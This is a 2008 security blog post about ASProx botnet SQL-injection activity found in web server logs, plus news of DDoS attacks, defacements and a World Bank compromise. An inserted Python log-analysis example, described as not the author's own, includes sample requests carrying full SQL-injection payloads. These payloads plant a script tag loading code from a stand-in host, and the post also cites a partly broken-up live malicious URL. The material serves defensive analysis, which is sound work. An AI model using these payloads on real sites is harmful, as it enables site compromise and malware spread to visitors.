Various Items: Oct 10, 2008
by Jose Nazario

Spent part of the day looking at ASProx botnet activity by groveling through Apache web server logs. Our fast flux monitor has been looking at their domain name usage for a number of months, but this aspect has been on the back burner for me for a bit. The poking around was quite productive, actually. I’m able to extract the scanning bot and the URL it is injecting in about 40 lines of Python, and then it’s pitched over to a second set of processes that store the data in a long term database. I went ahead and Googled one of the URLs I saw from a couple of days ago and noticed it’s spread rather far and wide, just like all ASProx botnet activity.
Results 1 - 100 of about 2,580 for h t tp:/ /w ww 3.ss 11qn.cn/csrss/w.js with Safesearch on. (0.15 seconds)
(Link intentionally broken up.) Tackling this one is proving to be a challenge.
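The log-mining step described above, as an added example that is not the author's own script: a small Python extractor that pulls the scanning source IP and the injected script URL out of Apache combined log lines. The sample log lines, the bad.example domain and the payload shape (a T-SQL fragment carrying a script tag, optionally wrapped in a hex literal) are constructed here for illustration and are assumptions, not data from the post.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache "combined" format: ip identd user [timestamp] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
# Markers of mass SQL-injection scanning: a T-SQL fragment plus an injected <script src=...> tag.
SQLI_RE = re.compile(r'\b(DECLARE|CAST|EXEC)\b', re.I)
SCRIPT_RE = re.compile(r'<script\s+src=["\']?(https?://[^"\'>\s]+)', re.I)
HEX_RE = re.compile(r'0x([0-9a-fA-F]{16,})')  # long hex literal wrapping a payload (assumed obfuscation)


def decode_request(req):
    """URL-decode the request line twice (double encoding is common) and expand any long hex
    literal, trying both one-byte-per-char and UTF-16LE since the payload may target VARCHAR or NVARCHAR."""
    text = unquote(unquote(req))
    for h in HEX_RE.findall(text):
        raw = bytes.fromhex(h)
        text += ' ' + raw.decode('latin-1') + ' ' + raw.decode('utf-16-le', errors='ignore')
    return text


def extract_injections(lines):
    """Return {injected_url: {scanner_ip, ...}} for every request carrying a SQL fragment and a script tag."""
    hits = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        text = decode_request(m.group('req'))
        if not SQLI_RE.search(text):
            continue
        for url in SCRIPT_RE.findall(text):
            hits[url].add(m.group('ip'))
    return dict(hits)


# Constructed sample log lines (not real traffic). The second request wraps the same script tag in a hex literal.
HEX_PAYLOAD = "<script src=http://bad.example/w.js></script>".encode('latin-1').hex()
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2008:09:12:01 -0400] "GET /page.asp?id=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S='
    '%27%3Cscript%20src=http://bad.example/w.js%3E%3C/script%3E%27;EXEC(@S);-- HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [10/Oct/2008:09:12:03 -0400] "GET /item.asp?cat=3;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x'
    + HEX_PAYLOAD + '%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1" 500 612 "-" "Mozilla/4.0"',
    '192.0.2.9 - - [10/Oct/2008:09:13:44 -0400] "GET /index.html HTTP/1.1" 200 3021 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for url, ips in extract_injections(SAMPLE_LOG).items():
        print(url, sorted(ips))  # one line per injected URL with the scanner IPs that pushed it
```

The per-URL set of source IPs is what gets handed to a longer-term store; grouping by injected URL rather than by IP is what makes the spread of a single campaign visible.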
Domestic political DDoS is nothing new, although it is rare. It looks like an independent political news site was DDoS’d this week, although I do not know the C&C at this point. I have seen the IPs in use get attacked back in May when they were used by another domain name. I don’t know if the two domain names are related at all.
From time to time I see a Vietnamese site or two get hit with a DDoS. This week the site 5giay.vn has been hit by a DDoS. Motivations are unclear; it has been reported that “5giay.vn believes that one of the reasons that the website has become a target for hackers is that it is a very bustling online trade website, and thus draws the attention of blackhat hackers.” No further information is available.
Speaking of DDoS, the news this week has been covering the fact that two Europeans have been indicted over DDoS attacks in the states. They are fugitives, it seems.
In follow-ups to the recent Islamic website attacks, retaliatory attacks have been launched, it seems. The website of Saudi-owned satellite channel Al-Arabiya was defaced as a counter attack.
It looks like the World Bank has come under systematic compromise. Documents released show that this was discovered a few months ago, and the full extent may not be known yet. Everyone thinks they know everything about their networks until it comes time to make sure that you really do; it’s just a sad fact of life.
Finally, in conference news, some of our guys will be speaking at NANOG on IPv6, as well as at RIPE 57 in Dubai. This is about their IPv6 deployment measurements. And if you think you want to get some research out, I am on the PC of LEET 09, a Usenix workshop held every spring. Worth attending, or at least reading the papers.